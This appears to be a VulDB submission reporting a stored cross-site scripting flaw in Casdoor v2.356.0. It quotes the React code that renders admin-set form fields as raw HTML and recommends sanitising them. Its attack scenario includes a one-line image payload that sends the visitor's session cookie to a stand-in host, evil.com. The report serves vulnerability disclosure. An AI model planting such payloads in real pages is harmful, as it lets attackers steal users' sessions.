| 제목 | Casdoor v2.356.0 Cross Site Scripting |
|---|
| 설명 | Stored XSS via Application formCss / formSideHtml
**Evidence:**
```javascript
{inIframe() || isMobile() ? null : <div dangerouslySetInnerHTML={{__html: application.formCss}} />}
{inIframe() || !isMobile() ? null : <div dangerouslySetInnerHTML={{__html: application.formCssMobile}} />}
<div dangerouslySetInnerHTML={{__html: application.formSideHtml}} />
```
The `formCss`, `formCssMobile`, and `formSideHtml` fields from the application object are rendered as raw HTML using `dangerouslySetInnerHTML`. If an organization admin (or anyone who can modify application settings) injects malicious JavaScript into these fields, it executes for every user who visits the login page.
**Attack scenario:** An org admin sets `formSideHtml` to `<img src=x onerror="fetch('https://evil.com/steal?t='+document.cookie)">`. Every user visiting the login page has their session cookies exfiltrated.
**Fix:** Sanitize these fields with a library like DOMPurify before rendering, or restrict them to a CSS-only subset by parsing and validating the content server-side.
--- |
|---|
| 사용자 | Ghufran Khan (UID 95493) |
|---|
| 제출 | 2026. 03. 17. PM 02:25 (18 날 ago) |
|---|
| 모더레이션 | 2026. 04. 03. AM 09:26 (17 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 355072 [Casdoor 2.356.0 dangerouslySetInnerHTML formCss/formCssMobile/formSideHtml 크로스 사이트 스크립팅] |
|---|
| 포인트들 | 17 |
|---|